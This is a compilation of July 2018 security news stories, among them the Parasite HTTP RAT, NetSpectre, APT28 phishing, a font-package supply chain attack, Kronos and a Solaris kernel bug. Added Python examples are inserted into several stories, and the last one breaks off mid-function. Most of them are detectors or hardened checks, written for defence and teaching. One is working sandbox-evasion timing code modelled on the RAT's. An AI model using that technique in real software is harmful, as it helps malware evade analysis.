A newly discovered remote access Trojan (RAT) dubbed Parasite HTTP includes a broad range of protections, including sandbox detection, anti-debugging, anti-emulation, and more, Proofpoint reports.

The malware is being advertised on an underground forum and has already been used in an infection campaign. Thanks to its modular architecture, its capabilities can be expanded by loading new modules after a system is infected.

The threat was recently used in a small email campaign targeting recipients primarily in the information technology, healthcare, and retail industries. The emails contained Microsoft Word attachments with malicious macros designed to download the RAT from a remote site.

Written in C, the tool is advertised as having no dependencies, a small size of around 49 KB, and plugin support. Its author also claims the malware resolves API calls dynamically, encrypts its strings, ships with a secure command and control (C&C) panel written in PHP, can bypass firewalls, and encrypts its communications.

Among other features, the author also advertises a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” Proofpoint says.

In addition to string obfuscation, Parasite HTTP uses a sleep routine to delay execution and to detect sandboxes or emulation. It first checks whether an exception handler has run, then checks “whether between 900ms and two seconds elapsed in response to the routine’s 1 second sleep split into 10ms increments.”

When it detects a sandbox, the malware does not simply exit or throw an error; it crashes in a way that makes it harder to determine why. The RAT also borrows sandbox-detection code from a public repository.
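The timing check described above is worth seeing in working form, because both bounds do work: too little elapsed time means the sandbox returned from Sleep without waiting, too much means it jumped the clock forward to fake a long wait. The following is an added example written for this page, not Proofpoint’s code or the RAT’s, and it is deliberately in Python rather than the malware’s C: the sleep and clock functions are injectable so the three environments (real host, sleep-skipping sandbox, clock-fast-forwarding sandbox) can be simulated offline. The bounds, step size and the `SimulatedHost` model are assumptions of the example; the 900 ms to 2 s window mirrors the one Proofpoint quotes.

```python
import time


def sleep_check_tripped(sleep=time.sleep, clock=time.perf_counter,
                        total_s=1.0, step_s=0.01, lo_s=0.9, hi_s=2.0) -> bool:
    """Sleep total_s in step_s slices and report whether the elapsed wall-clock
    time falls outside [lo_s, hi_s]. Below lo_s: sleeps were skipped. Above
    hi_s: the clock was advanced artificially to simulate the wait."""
    start = clock()
    for _ in range(round(total_s / step_s)):
        sleep(step_s)
    elapsed = clock() - start
    return not (lo_s <= elapsed <= hi_s)


class SimulatedHost:
    """Fake sleep/clock pair (assumed model, not a real sandbox). sleep_factor
    is how far the clock moves per requested second: 1.0 for a real host, 0.0
    for a sandbox that returns from Sleep immediately, >1 for a sandbox that
    fast-forwards its clock to make skipped sleeps look genuine."""

    def __init__(self, sleep_factor: float):
        self.sleep_factor = sleep_factor
        self.now = 0.0

    def sleep(self, seconds: float) -> None:
        self.now += seconds * self.sleep_factor

    def clock(self) -> float:
        return self.now


def check_on(sleep_factor: float) -> bool:
    """Run the check against a simulated host; True means 'sandbox suspected'."""
    host = SimulatedHost(sleep_factor)
    return sleep_check_tripped(sleep=host.sleep, clock=host.clock)


if __name__ == "__main__":
    print("real host (1.0x):          ", check_on(1.0))
    print("sleep skipped (0.0x):      ", check_on(0.0))
    print("clock fast-forwarded (50x):", check_on(50.0))
    print("this machine, real sleep:  ", sleep_check_tripped())
```

Splitting the wait into 10 ms slices is what defeats the common sandbox trick of shortening only long sleeps: a hundred short calls either all pass through (and the check sees a real second) or all get skipped (and the check sees almost nothing). The defensive counter is to make the emulated clock advance by exactly the requested amount on every Sleep call, which keeps the measurement inside the window.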

“Parasite HTTP also contains a bug caused by its manual implementation of a GetProcAddress API that results in the clearing code not executing,” Proofpoint's security researchers warn.

On Windows 7 and newer, the threat resolves critical APIs for creating its registry values. It also uses a process injection technique not seen in major malware families.

The malware includes an obfuscated check for debugger breakpoints within a range of its own code. Parasite HTTP also removes hooks from a series of DLLs, but restores only the first 5 bytes of each hooked function; if a sandbox installed its hook with a 6-byte indirect jump, the leftover byte would likely crash the process.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint says.


Remote Spectre Attack Allows Data Theft Over Network
28.7.2018 securityweek Attack

A team of researchers from the Graz University of Technology in Austria has demonstrated that Spectre attacks can be launched remotely without the need to execute code on the targeted machine.

The researchers, some of whom were also involved in the discovery of the original Meltdown and Spectre vulnerabilities, have dubbed the new attack NetSpectre, as it allows a remote attacker to read arbitrary memory over the network.

NetSpectre attacks have been successfully conducted by the experts both in a local area network (LAN) and between virtual machines in Google Cloud.

While NetSpectre attacks can in theory pose a significant risk, data can only be leaked very slowly. The researchers achieved an exfiltration rate of 15 bits per hour over a local network using a cache covert channel, and 60 bits per hour using a new AVX-based covert channel; the latter is the first Spectre attack that does not rely on a cache covert channel.

In experiments conducted using Google Cloud, researchers managed to leak data from an independent virtual machine at a rate of 3 bits per hour.

The Spectre and Meltdown speculative execution vulnerabilities impact processors from Intel, AMD, ARM and other companies, and they allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. There are several variants of each flaw, but the original vulnerabilities are Spectre (Variant 1 and Variant 2) and Meltdown (Variant 3).

Exploitation of these flaws has so far required executing arbitrary code on the targeted system, but NetSpectre, which is related to Variant 1, shows that remote attacks are possible without executing code on the victim’s device.

Researchers also demonstrated that this remote attack method can also be used to break the address-space layout randomization (ASLR) mitigation even if no data is leaked.

Fortunately, NetSpectre attacks can be prevented using the mitigations recommended for the original Spectre. In addition, since this is a network-based attack, network-layer countermeasures can also be effective in blocking it.

“A trivial NetSpectre attack can easily be detected by a DDoS protection, as multiple thousand identical packets are sent from the same source,” researchers explained. “However, an attacker can choose any trade-off between packets per second and leaked bits per second. Thus, the speed at which bits are leaked can simply be reduced below the threshold that the DDoS monitoring can detect. This is true for any monitoring which tries to detect ongoing attacks, e.g., intrusion detection systems. Although the attack is theoretically not prevented, at some point the attack becomes infeasible, as the time required to leak a bit increases drastically.”

However, experts warned that new methods may be found in the future that bypass current protections and mitigations.

Intel has updated its whitepaper titled “Analyzing potential bounds check bypass vulnerabilities” to include NetSpectre attacks.

Jon Masters, Chief Arm Architect and Computer Microarchitecture Lead at Red Hat, says his company has “not identified any viable userspace spectre gadget attacks but are actively auditing all of the daemons that listen over the network and the rest of the stack.”


Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs Social

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

jack (@jack) tweeted on Mar 1, 2018: “We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.”

The social media giant is restricting access to its application programming interfaces (APIs), which allow developers to automate interactions with the platform (e.g. posting tweets).

Spam and abuse are serious problems for the platform: every day a large number of bots are used to influence sentiment on specific topics or to spread misinformation or racist content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter is a hard task. Since Tuesday, Twitter has deployed a new application process for developers who intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com,” Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service.”


At the same time, many legitimate applications use the Twitter APIs to automate processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale,” concludes Twitter.


Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT

The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), which operates under the Russian military intelligence agency GRU, continues to target US politicians.

This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.

The news was reported by The Daily Beast. McCaskill has always been critical of Russia and its aggressive strategy in cyberspace: she has repeatedly accused the Russian Government of “cyber warfare against our democracy,” and she has called President Vladimir Putin a “thug” and a “bully.”

Russian cyberspies launched spear-phishing attacks against members of her staff aimed at stealing their credentials, a tactic already used against Hillary Clinton’s campaign chairman John Podesta in 2016.

The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.

“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.

“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”


In July, Microsoft helped the US Government in protecting at least three 2018 midterm election candidates from attacks by Russian cyberspies.

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website, it took the site down and helped the US government to “avoid anybody being infected by that particular attack.”

“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.

Microsoft sinkholed the domain, which allowed it to track the victims who were redirected to the phishing page.
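The lure described above is a password-expiry notice whose link leads to a replica login page on a lookalike domain (adfs.senate.qov.info in the report). The following added example, which is not code from The Daily Beast, Microsoft or the Senate, shows a mail-filter check that classifies the host of every link in a message against the expected single sign-on host; the expected host name `adfs.senate.gov` and the sample message are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed assumption: the hostname of the legitimate single sign-on page
# that a genuine password notice would link to. The report above does not
# name it; set it to the real SSO host in your environment.
EXPECTED_SSO_HOST = "adfs.senate.gov"


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (plain dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sso_host(host: str):
    """Return (verdict, reason) for a hostname found in a password-reset link.

    'trusted'   : the expected SSO host or a name under its registrable domain
    'lookalike' : most of the expected labels reappear under a different
                  registrable domain, possibly with one-character changes
                  (adfs.senate.qov.info against adfs.senate.gov)
    'untrusted' : anything else
    """
    host = host.lower().rstrip(".")
    expected = EXPECTED_SSO_HOST.split(".")
    registrable = ".".join(expected[-2:])
    if host == registrable or host.endswith("." + registrable):
        return "trusted", "expected SSO host"
    labels = host.split(".")
    near = [l for l in labels if any(levenshtein(l, e) <= 1 for e in expected)]
    if len(near) >= 2:
        return "lookalike", f"labels {near} mimic {EXPECTED_SSO_HOST}"
    return "untrusted", "host unrelated to the expected SSO host"


def check_reset_links(email_body: str):
    """Extract http(s) links from a message body and classify each host."""
    findings = []
    for url in re.findall(r"https?://[^\s\"'<>]+", email_body):
        host = urlsplit(url).hostname or ""
        verdict, reason = classify_sso_host(host)
        findings.append((url, verdict, reason))
    return findings


# Constructed sample message modelled on the lure described in the report;
# the link target uses the spoofed domain the report names.
SAMPLE_EMAIL = (
    "Your Microsoft Exchange password has expired.\n"
    "Change it now at https://adfs.senate.qov.info/adfs/ls/ to keep access.\n"
)
```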

The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.

Microsoft attributed the attacks to the Russian APT28 group.

McCaskill released a statement confirming that the cyberattack was unsuccessful.

“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.

“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”


Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency

Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.

Following Apple’s decision to ban cryptocurrency mining apps, announced in June, Google has also updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.

“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.

Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and in some cases can also damage it by causing overheating or destroying the battery.

In December, experts from Kaspersky spotted an Android malware dubbed Loapi that includes such an aggressive mining component that it can destroy the device’s battery.


Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.

Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.


Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor
28.7.2018 securityaffairs Attack

Microsoft revealed that hackers attempted to compromise the supply chain of an unnamed maker of PDF software.
The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines.

The attack was discovered by the experts from Microsoft that received alerts via the Windows Defender ATP.

Microsoft discovered that attackers compromised the cloud server infrastructure of a software company that provides font packages for other software firms.

The packages are distributed as MSI files and experts revealed that one of the companies using these packages was the firm that developed the PDF editor application.

The compromise lasted between January and March 2018. According to the tech giant, the hackers compromised only a small number of machines, which could indicate that the affected companies working with the font package provider have a small market share.

This is a multi-tier attack in which the attackers compromised the supply chain of the supply chain.

“A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case.” reads the analysis published by Microsoft.

“Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the app’s legitimate installer the unsuspecting carrier of a malicious payload.”


The hackers cloned the infrastructure of the company that develops the PDF Editor, they set up a server containing all MSI files, including font packages, all clean and digitally signed.

The hackers poisoned an MSI file associated with an Asian fonts pack with a crypto miner, then devised a technique to influence the download of the font by the PDF Editor from the attackers’ server.

Once victims install the PDF editor app, the application installs the font packages from the cloned server managed by the attackers, including the tainted one.

Below is the multi-tier attack sequence described by Microsoft:

Attackers recreated the software partner’s infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font package, all clean and digitally signed, in the replica server.
The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. With this package tampered with, it is no longer trusted and signed.
Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server.
The attackers have targeted the supply chain by hiding the miner in an installer to have full elevated privileges (SYSTEM) on a machine.

The crypto-mining malware would create a process named xbox-service.exe that abuses the computational resources of the victims to mine Monero coins.

The malware also tries to modify the Windows hosts file so that the victim’s machine can’t communicate with the update servers of certain PDF apps and security software. The trick would prevent remote cleaning and remediation of affected machines.
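Two controls follow from the attack chain above: the installer should refuse a font package that arrives from a host other than the expected partner server or that no longer carries a valid signature, and defenders can detect the hosts-file tampering that cuts infected machines off from update servers. The following added example, which is not Microsoft’s or the affected vendors’ code, shows both as standalone checks; the partner host, the protected update domains and the sample hosts file are constructed.

```python
import ipaddress
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Constructed values: the partner host the installer is supposed to fetch
# font packages from, and update/security domains whose silencing in the
# hosts file would indicate the tampering described above.
EXPECTED_PACKAGE_HOSTS = {"fonts.partner.example"}
PROTECTED_UPDATE_DOMAINS = {
    "update.pdfvendor.example",
    "definitions.security-vendor.example",
}


def download_allowed(url: str, signature_valid: bool) -> Tuple[bool, str]:
    """Policy an installer can apply before executing a fetched MSI.

    The download host must be the expected partner host (so a hijacked
    download parameter pointing at a replica server is refused), transport
    must be HTTPS, and the package must still carry a valid signature (the
    repackaged fonts MSI in the case above no longer did).
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, f"refusing non-HTTPS download: {url}"
    if parts.hostname not in EXPECTED_PACKAGE_HOSTS:
        return False, f"download host {parts.hostname!r} is not an expected partner host"
    if not signature_valid:
        return False, "package signature missing or invalid; not installing"
    return True, "ok"


def hosts_file_overrides(hosts_text: str) -> Dict[str, str]:
    """Return protected update domains that a hosts file pins to an address.

    Any override of these names is suspicious; the loopback or unspecified
    address is the classic way to cut a machine off from its update servers.
    """
    overrides: Dict[str, str] = {}
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                              # not a hosts entry
        for name in fields[1:]:
            name = name.lower().rstrip(".")
            if name in PROTECTED_UPDATE_DOMAINS:
                overrides[name] = str(addr)
    return overrides


# Constructed sample hosts file: the two protected domains have been
# redirected, the localhost entry is normal.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
127.0.0.1       update.pdfvendor.example
0.0.0.0         definitions.security-vendor.example   # added by malware
"""
```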


Kronos Banking Trojan resurrection, new campaigns spotted in the wild
28.7.2018 securityaffairs Virus

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in the recent months.
The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.

The malware was first spotted in 2014 by researchers at security firm Trusteer, who discovered an advertisement on the Russian underground market for a new financial Trojan dubbed Kronos.


The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variants share many similarities with older versions:

Extensive code overlap
Same Windows API hashing technique and hashes
Same string encryption technique
Extensive string overlap
Same C&C encryption mechanism
Same C&C protocol and encryption
Same webinject format (Zeus format)
Similar C&C panel file layout
“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” reads the analysis published by Proofpoint.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

A first campaign was observed on June 27: the malware targeted German users with weaponized documents attached to spam emails. The macros included in the document were used as a downloader for the payload, in some cases via the SmokeLoader downloader.

A second campaign was uncovered on July 13, in which victims were infected through a malvertising campaign. The malicious ads pointed to a website that, thanks to JavaScript injections, redirected visitors to the RIG exploit kit, which delivered SmokeLoader. The downloader then delivered Kronos onto the compromised machines.

A third campaign has been observed since July 15; victims receive fake invoice emails carrying weaponized documents that attempt to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”


Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs Vulnerability

Security experts discovered a Kernel Level Privilege Escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3.
Security researchers from Trustwave have discovered a new high severity vulnerability, tracked as CVE-2018-2892, that affected the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by a remote authenticated attacker to execute code with elevated privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The experts noted that the flaw was first found in 2007 and was publicly disclosed in 2009 at the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issues and an unbounded memory write vulnerability.

“The original issue was disclosed on stage at CanSec 2009 (https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”


Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.
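The root cause above is a signedness bug: a user-supplied array index is tested only against an upper bound while being treated as a signed integer, so a negative value passes the check and addresses memory before the table. The following added illustration, which is not Trustwave’s or Oracle’s code, emulates 32-bit C integer semantics in Python and places the vulnerable check beside the hardened one; SLOT_COUNT, SLOT_SIZE and TABLE_BASE are constructed values.

```python
SLOT_COUNT = 16          # constructed: number of entries in the kernel-side table
SLOT_SIZE = 64           # constructed: bytes per table entry
TABLE_BASE = 0x10000     # constructed: start address of the table


def as_signed32(raw: int) -> int:
    """Interpret a 32-bit pattern the way a C 'int' would."""
    raw &= 0xFFFFFFFF
    return raw - (1 << 32) if raw & 0x80000000 else raw


def vulnerable_index_ok(raw_index: int) -> bool:
    """Mimics a check like 'if (ar >= SLOT_COUNT) return EINVAL;' on a signed
    int: only the upper bound is tested, so a negative index slips through."""
    ar = as_signed32(raw_index)
    return ar < SLOT_COUNT


def hardened_index_ok(raw_index: int) -> bool:
    """Compare as unsigned (equivalently: also test 'ar < 0'): any value with
    the sign bit set is far larger than SLOT_COUNT and is rejected."""
    ar = raw_index & 0xFFFFFFFF
    return ar < SLOT_COUNT


def slot_address(raw_index: int) -> int:
    """Where an expression like '&table[ar]' would point if the signed value
    were used without a lower-bound check."""
    return TABLE_BASE + as_signed32(raw_index) * SLOT_SIZE


def address_in_table(addr: int) -> bool:
    """True if addr lies inside the table the index is meant to select from."""
    return TABLE_BASE <= addr < TABLE_BASE + SLOT_COUNT * SLOT_SIZE


def hardened_length_ok(raw_len: int, dst_size: int) -> bool:
    """Same rule for a user-supplied copy length: compare as unsigned and
    never let it exceed the destination buffer that copyin() writes to."""
    return (raw_len & 0xFFFFFFFF) <= dst_size
```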

According to the experts, the flaw is still present in the product because of additional code that was introduced for testing purposes.

Oracle addressed this flaw as part of the July CPU security updates.


Ransomware attack disrupted some systems of the shipping giant COSCO in the US
28.7.2018 securityaffairs Ransomware

The Chinese shipping giant COSCO was reportedly hit by a ransomware based attack, the attack occurred in the American region.
According to COSCO a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack and quoted a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”


The shipping company quickly isolated the affected systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of its fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported that communications between the carrier’s U.S. operations and its customers had been slowed by the cyber attack. Digital communications were disrupted, and communications were being conducted by telephone.

JOC.com (@JOC_Updates) tweeted on Jul 24, 2018: “Cosco responds to cyber attack on US operations #maritime #containers http://bit.ly/2uMjJJS”

Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

According to the popular security expert Kevin Beaumont, the ransomware infected the portion of the infrastructure that hosts the company website (cosco-usa.com), the phone and email systems, and the WAN and VPN gateways.

Catalin Cimpanu (@campuscodi), Jul 26, 2018, replying to @GossiTheDog: “Their global website is still working fine. Only their US site is down from what it appears. http://lines.coscoshipping.com/home/News/detail/15325081261286611042/50000000000000231?id=50000000000000231 …”

Kevin Beaumont (@GossiTheDog), Jul 26, 2018: “Yes, it is only Cosco Americas Inc (CAI) impacted. Anything on this network: https://ipinfo.io/AS32604 - includes their website http://www.cosco-usa.com , their phone system, WAN and VPN gateways, email etc.”

Kevin Beaumont (@GossiTheDog), Jul 26, 2018: “If anybody from Cosco is reading I help with anything like this free of charge for the insight gained, send me an email if you want.”

Kevin Beaumont (@GossiTheDog), Jul 26, 2018: “Cosco have put out a statement confirming the issue. I understand they’re now on their 4th day of downtime for CAI (Cosco Americas Inc) business unit. https://www.itwire.com/security/83772-cosco-s-us-arm-hit-by-windows-ransomware.html …”

At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack does not appear as severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to Maersk’s second quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption,” because it was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”


ProtonMail launches Address Verification and full PGP support
28.7.2018 securityaffairs Crypto

Address Verification allows you to be sure you are securely communicating with the right person, while PGP support adds encrypted email interoperability.
Starting with the latest release of ProtonMail on web (v3.14), iOS and Android (v1.9), and the latest versions of the ProtonMail IMAP/SMTP Bridge, ProtonMail now supports Address Verification, along with full PGP interoperability and support. In this article, we’ll discuss these two new features in detail, and how they can dramatically improve email security and privacy.

Address Verification
When ProtonMail first launched in 2014, our goal was to make email encryption ubiquitous by making it easy enough for anybody to use. This is no easy feat, and that’s probably why it had never been done before. Our guiding philosophy is that the most secure systems in the world don’t actually benefit society if nobody can use them, and because of this, we made a number of design decisions for the sake of better usability.

One of these decisions was to make encryption key management automatic and invisible to the user. While this made it possible for millions of people around the world to start using encrypted email without any understanding of what an encryption key is, the resulting architecture required a certain level of trust in ProtonMail.

While a certain level of trust is always necessary when you use online services, our goal is to minimize the amount of trust required so that a compromise of ProtonMail doesn’t lead to a compromise of user communications. This is the philosophy behind our use of end-to-end encryption and zero-access encryption, and it is also the philosophy behind Address Verification.

Prior to the introduction of Address Verification, if ProtonMail was compromised, it would be possible to compromise user communications by sending to the user a fake public encryption key. This could cause email communications to be encrypted in a way that an attacker, holding the corresponding fake private key, could intercept and decrypt the messages (this is also known as a Man-in-the Middle attack, or MITM), despite the fact that the encryption takes place client side.

Address Verification provides an elegant solution to this problem. We consider this to be an advanced security feature and probably not necessary for the casual user, but as there are journalists and activists using ProtonMail for highly sensitive communications, we have made adding Address Verification a priority.

How Address Verification works
Address Verification works by leveraging the Encrypted Contacts feature that we released previously. Starting with the latest version of ProtonMail, when you receive a message from a ProtonMail contact, you now have the option (in the ProtonMail web app) to Trust Public Keys for this contact. Doing so saves the public key for this contact into the encrypted contacts, and as contacts data is not only encrypted, but also digitally signed, it is not possible to tamper with the public encryption key once it has been trusted.

This means that when sending emails to this contact, it is no longer possible for a malicious third party (even ProtonMail) to trick you into using a malicious public key that is different from the one you have trusted. This allows for a much higher level of security between two parties than is possible with any other encrypted email service. You can learn more about using Address Verification in our knowledge base article.
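The mechanism described above is key pinning backed by signed contact data: once a contact’s public key is trusted, the fingerprint lives in a contact record that the client signs, so neither the stored fingerprint nor a later substituted key can be used without the check failing. The following added example is not ProtonMail’s code: it models that flow with the standard library, using a constructed HMAC secret as a stand-in for the user’s asymmetric contact-signing key and constructed byte strings in place of real PGP keys.

```python
import hashlib
import hmac
import json
from typing import Optional

# Stand-in for the user's contact-signing key. ProtonMail signs contact data
# with an asymmetric key; a constructed HMAC secret is used here so the example
# runs with the standard library only. The property shown is the same: a
# contact record (and the pinned key inside it) cannot be altered without
# the signature check failing.
CONTACT_SIGNING_SECRET = b"constructed-contact-signing-secret"


def fingerprint(public_key: bytes) -> str:
    """Fingerprint of a public key; this is what gets pinned for a contact."""
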